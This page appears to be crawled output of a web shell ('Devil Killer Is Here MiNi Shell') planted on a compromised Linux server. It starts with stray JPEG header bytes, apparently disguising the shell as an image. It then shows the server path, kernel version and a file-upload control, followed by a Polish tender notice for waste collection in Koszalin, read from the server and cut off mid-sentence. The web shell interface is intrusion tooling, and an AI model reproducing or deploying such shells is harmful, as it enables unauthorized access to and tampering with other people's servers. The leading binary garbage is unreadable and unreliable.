JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250911/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250911/0041806601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Odbiór i zagospodarowanie odpadów w 2025 roku w podziale <br/>na 3 zadania. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330253984</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Komunalna 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">75-724</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pgk@pgkkoszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pgkkoszalin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów w 2025 roku w podziale <br/>na 3 zadania. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-47407328-4a50-4890-8e8b-d53504602d91</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00418066</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/1171974 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W przedmiotowym postępowaniu komunikacja pomiędzy Zamawiającym a<br/>Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się przy<br/>użyciu środków komunikacji elektronicznej za pośrednictwem strony https://platformazakupowa.pl/transakcja/1171974 zwanej dalej<br/>Platformą. Wykonawcy winni zapoznać się z regulaminem Platformy, znajdującym się na stronie<br/>https://platformazakupowa.pl/strona/1-regulamin, oraz Instrukcjami dla Wykonawców: link: https://platformazakupowa.pl/strona/45-<br/>instrukcje , w którym zawarto wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym, a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie Pzp, odbywa się przy użyciu środków<br/>komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 roku o świadczeni u usług drogą elektroniczną. Ofertę, oświadczenia, o których mowa w art. 125 ust. ustawy Pzp, podmiotowe środki dowodowe, zobowiązanie podmiotu udostępniającego zasoby w tym oświadczenie składane na podstawie art. 117 ust. 4 ustawy PZP, przedmiotowe środki dowodowe, pełnomocnictwo sporządza się w postaci elektronicznej, w<br/>formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 307, 1222 z późn. zm.), z uwzględnieniem rodzaju przekazywanych danych. Ofertę, a także oświadczenie o jakim mowa w pkt 8.1 składa się, pod rygorem nieważności, w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku (RODO) uprzejmie informujemy, że:1) Administratorem danych osobowych przetwarzanych w<br/>Przedsiębiorstwie jest Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o. 2) Dokładne informacje dotyczące zasad przetwarzania danych osobowych znajdują się na stronie BIP Przedsiębiorstwa Gospodarki Komunalnej pod adresem:http://pgk.koszalin.ibip.pl/public/?id=216428 3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c<br/>RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego; 4) odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy z dnia<br/>11 września 2019 r. – Prawo zamówień publicznych (t.j. Dz. U. z 2024 r., poz. 1320 z późn. zm. ), dalej „ustawa Pzp”; 5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy PZP przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;6)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje nie podania określonych danych wynikają z ustawy Pzp; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany;8) posiada Pani/Pan:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;− na<br/>podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; − prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9) nie<br/>przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO;10) Pani/Pana dane osobowe nie będą przekazywane do państw trzecich lub organizacji międzynarodowych.___*Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. ** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">patrz punkt. 3.15)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">39/AP/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 1: odbiór i zagospodarowanie odpadów o kodzie 17 09 04 –z Regionalnego Zakładu Odzysku Odpadów w Sianowie przy ul. Łubuszan 80, Zmieszane odpady z budowy, remontów i demontażu inne niż wymienione w 17 09 01, 17 09 02 i 17 09 03	17 09 04	w ilości Do 200,00	Mg, wymagany proces zagospodarowania R12, a)	Przedmiotem zamówienia jest cykliczny odbiór i zagospodarowanie poprzez proces odzysku R12 odpadów o kodzie 17 09 04 zmieszanych odpadów z budowy, remontów i demontażu inne niż wymienione w 17 09 01, 17 09 02 i 17 09 03 z Regionalnego Zakładu Odzysku Odpadów w Sianowie (dalej RZOO) przy ul. Łubuszan 80. Sposób zagospodarowania przedmiotowych odpadów musi być zgody z obowiązującymi w tym zakresie przepisami prawa i decyzjami posiadanymi przez Wykonawcę.<br/>b)	Wytwórca odpadów budowlanych i rozbiórkowych jest obowiązany do zapewnienia wysegregowania z wytworzonych przez siebie odpadów budowlanych i rozbiórkowych, których powstaniu nie mógł zapobiec zgodnie z art. 18 odzysk odpadów ust. 1 Ustawy <br/>z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2023 r. poz. 1587, t.j.), co najmniej: drewna, metali, szkła, tworzyw sztucznych, gipsu i odpadów mineralnych, w tym betonu, cegły, płytek i materiałów ceramicznych oraz kamieni w celu zapewnienia przydatności do przygotowania do ponownego użycia, recyklingu lub innego odzysku, chyba że wysegregowanie nie jest technologicznie możliwe lub brak wysegregowania pozwala na przygotowanie do ponownego użycia, recykling lub inny odzysk.<br/>c)	Odpady będące przedmiotem umowy zostaną odebrane, a następnie zagospodarowane na terenie zakładów wskazanych przez Wykonawcę w sposób zgodny z obowiązującymi w tym zakresie przepisami prawa oraz procesami wyszczególnionymi w załączniku nr 1 do Ustawy o odpadach.<br/>d)	Odpady te mogą zostać poddane procesowi odzysku R12 zgodnie z określeniem oznaczenia tego procesu w Ustawie o odpadach/załączniku IA do Rozporządzenia (WE) <br/>nr 1013/2006 Parlamentu Europejskiego i Rady Unii Europejskiej z dnia 14.06.2006r. <br/>w sprawie przemieszczania odpadów (Dz. U. UE. L 190/1 z późn. zm.) - przy czym przez „poddanie procesowi odzysku rozumie się rozpoczęcie i zakończenie tego procesu.<br/>e)	Odpowiedzialność za wykonanie obowiązku, o którym mowa w ust. 1, ponoszą solidarnie wytwórca odpadów budowlanych i rozbiórkowych, następny posiadacz odpadów, o którym mowa w ust. 2 oraz podmiot, o którym mowa w art. 27 ust. 2.<br/>f)	Zmieszane odpady z budowy, remontów i demontażu inne niż wymienione w 170901, 170902 i 170903* będące przedmiotem zamówienia pochodzą głównie z Punktów Selektywnego Zbierania Odpadów Komunalnych (PSZOK). <br/>g)	Wykonawca nie będzie kwestionował jakości odbieranych odpadów, a w związku z powyższym Wykonawca nie może odmówić odbioru i przyjęcia do zagospodarowania w/w odpadów.<br/>h)	Wykonawca musi zapewnić ciągły, nieprzerwany, sukcesywny odbiór odpadów oraz zagwarantować zagospodarowanie odpadu w roku, w którym zostały odebrane od zamawiającego.<br/>i)	Odpady zbierane są bez zadaszenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90510000-5 - Usuwanie i obróbka odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena najniższa<br/>C = --------------------------- x 100 pkt <br/> Cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów o kodzie 19 05 99 – z Regionalnego Zakładu Odzysku Odpadów w Sianowie przy ul. Łubuszan 80, nazwa odpadu Inne niewymienione odpady (stabilizat) , kod odpadu 19 05 99	przewidywana ilość do 870 Mg, wymagany proces zagospodarowania D5 lub R1. 2.2.	Zadanie 2:<br/>a)	Przedmiotem zamówienia jest cykliczny odbiór i zagospodarowanie poprzez proces unieszkodliwiania bądź odzysku odpadów o kodzie 19 05 99 inne niewymienione odpady (stabilizat) wytworzonych w procesie mechaniczno-biologicznego przetwarzania niesegregowanych (zmieszanych) odpadów komunalnych na terenie instalacji prowadzonej w Regionalnym Zakładzie Odzysku Odpadów w Sianowie (dalej RZOO) przy ul. Łubuszan 80 .<br/>b)	Odpad po procesie biologicznego przetwarzania (stabilizacji tlenowej), który po obróbce biologicznej został ustabilizowany kierowany jest na sito, gdzie zostaje przesiany w zakresie oczka 20-80mm.<br/>c)	Odpady będące przedmiotem umowy zostaną odebrane, a następnie zagospodarowane na terenie zakładów wskazanych przez Wykonawcę w sposób zgodny z obowiązującymi w tym zakresie przepisami prawa oraz procesami wyszczególnionymi w załączniku nr 2 do Ustawy o odpadach.<br/>d)	Odpady te mogą zostać poddane procesowi odzysku R1 lub unieszkodliwiania D5 zgodnie z określeniem oznaczenia tego procesu w Ustawie o odpadach/załączniku IA do Rozporządzenia (WE) nr 1013/2006 Parlamentu Europejskiego i Rady Unii Europejskiej z dnia 14.06.2006r. w sprawie przemieszczania odpadów (Dz. U. UE. L 190/1 z późn. zm.) - przy czym przez „poddanie procesowi odzysku” rozumie się rozpoczęcie i zakończenie tego procesu.<br/>e)	Stabilizat zgodnie z Rozporządzeniem Ministra Klimatu i Środowiska w sprawie mechaniczno-biologicznego przetwarzania niesegregowanych (zmieszanych) odpadów komunalnych zostaje unieszkodliwiany przez składowanie na składowiskach odpadów innych niż niebezpieczne i obojętne albo termicznie przekształcany.<br/>f)	Wykonawca zobowiązany jest do informowania Zamawiającego o utracie statusu instalacji komunalnej o której mowa w ust. 2.2.e w czasie trwania umowy.<br/>g)	Zamawiający przekaże Wykonawcy odpady wyłącznie spełniające wymagania określone w § 3 ust. 2 rozporządzenia Rady Ministrów z dnia 22 grudnia 2017r., w sprawie jednostkowych stawek opłat za korzystanie ze środowiska. Dodatkowo odpad, który będzie zagospodarowany metodą unieszkodliwiania będzie spełniał parametry wyznaczone wg. Rozporządzeniu Ministra Klimatu i Środowiska w sprawie mechaniczno-biologicznego przetwarzania niesegregowanych (zmieszanych) odpadów komunalnych (Dz. U. 2023 r., poz. 56). Spełnienie przez stabilizat parametrów potwierdzone zostanie badaniami laboratoryjnymi. Wyniki badań zostaną przekazane Wykonawcy.<br/>h)	Odpady o kodzie 19 05 99 mogą być zanieczyszczone innymi odpadami, takimi jak piasek, drobne szkło.<br/>i)	Jako zanieczyszczenia ustala się:<br/>a.	frakcje ulegające biodegradacji,<br/>b.	szkło,<br/>c.	części metalowe, <br/>d.	substancje i odpady niebezpieczne<br/>j)	Ustala się dopuszczalny poziom zanieczyszczeń jako 15% masy odbieranej <br/>od PGK Sp. z o.o.<br/>k)	W przypadku przekroczenia ilości zanieczyszczeń podanych powyżej Wykonawca jest uprawniony do odmowy odebrania odpadów z terenu RZOO Sianów. Strony postanawiają, że w takiej sytuacji: PGK Sp. z o.o. w Koszalinie nie będzie miała roszczenia o wykonanie umowy w tej części, którego się zrzeka, a Wykonawca nie wystąpi z roszczeniem o wykonanie umowy lub odszkodowanie z tego tytułu, w tym z tytułu kosztów transportu, których to roszczeń Wykonawca się zrzeka.<br/>l)	Wykonawca musi zapewnić ciągły, nieprzerwany, sukcesywny odbiór odpadów oraz zagwarantować zagospodarowanie odpadu w roku, w którym zostały odebrane od zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90510000-5 - Usuwanie i obróbka odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena najniższa<br/>C = --------------------------- x 100 pkt <br/> Cena oferty badanej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Odbiór i zagospodarowanie odpadów o kodzie 19 12 12 – z Regionalnego Zakładu Odzysku Odpadów w Sianowie przy ul. Łubuszan 80, nazwa odpadu Inne odpady (w tym zmieszane substancje i przedmioty) z mechanicznej obróbki odpadów inne niż wymienione w 19 12 11 - wytworzone z odpadów wielkogabarytowych	19 12 12	przewidywana ilość Do 550	Mg, wymagany proces zagospodarowania R1 lub R12; 2.3.	Zadanie 3:<br/>m)	Przedmiotem zamówienia jest cykliczny odbiór i zagospodarowanie poprzez proces odzysku odpadów o kodzie 19 12 12 (Inne odpady, w tym zmieszane substancje i przedmioty, z mechanicznej obróbki odpadów inne niż wymienione w 19 12 11), przy czym odpady te mogą zostać poddane procesowi R1 lub R12 zgodnie z określeniem oznaczenia tego procesu w Ustawie o odpadach/załączniku IA do Rozporządzenia (WE) nr 1013/2006 Parlamentu Europejskiego i Rady Unii Europejskiej z dnia 14.06.2006 r. w sprawie przemieszczania odpadów (Dz. U. UE. L 190/1 z późn. zm.) - przy czym przez „poddanie procesowi odzysku” rozumie się rozpoczęcie i zakończenie tego procesu. <br/>n)	Odpady w rozmiarze 80 - 400 mm pochodzące po wstępnym rozdrobnieniu i separacji magnetycznej odpadów wielkogabarytowych. Odpady nieprasowane (luzem). <br/>o)	Odpady o kodzie 19 12 12 mogą być zanieczyszczone innymi odpadami, takimi jak piasek, drobne szkło, itp. <br/>p)	Odebrane partie odpadów mogą różnić się co do składu, a jakiekolwiek różnice nie będą stanowiły podstaw roszczeń Wykonawcy w stosunku do Zamawiającego. <br/>q)	Wykonawca musi zapewnić ciągły, nieprzerwany, sukcesywny odbiór odpadów. <br/>r)	Odpady magazynowane są bez zadaszenia. <br/>s)	Średnia waga odpadów 19 12 12 przewożonych naczepą typu ruchoma podłoga szacuje się w wartości 22 Mg. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90510000-5 - Usuwanie i obróbka odpadów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający 